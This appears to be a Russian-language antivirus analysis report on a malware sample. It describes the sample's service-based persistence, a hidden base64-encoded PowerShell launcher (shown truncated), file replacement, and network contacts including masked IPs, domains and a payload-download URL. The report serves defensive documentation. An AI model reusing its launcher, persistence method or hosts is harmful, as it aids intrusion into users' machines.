Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\mgmorg] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\mgmorg] 'ImagePath' = '"%WINDIR%\SysWOW64\mgmorg.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\894.exe
Удаляет следующие файлы
- %HOMEPATH%\894.exe
Перемещает следующие файлы
- %HOMEPATH%\894.exe в %WINDIR%\syswow64\mgmorg.exe
Подменяет следующие файлы
- %HOMEPATH%\894.exe
Сетевая активность
Подключается к
- '19#.#6.118.15':443
- '10#.#27.100.228':80
- '12#.#38.101.250':80
TCP
Запросы HTTP GET
- http://ks.#d.ua/wp-includes/KXdkADm/
UDP
- DNS ASK li###more.tk
- DNS ASK ig###istics.in
- DNS ASK su####roshomes.com
- DNS ASK ks.#d.ua
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHUAagBoAG8AbgBqAHUAYgB0AHEAagA9ACcAUgBrAHQAdABhAGoAeABjAGgAagB4ACcAOwAkAE0AcgBrAHYAdQBvAHkAZwBkAG...' (со скрытым окном)
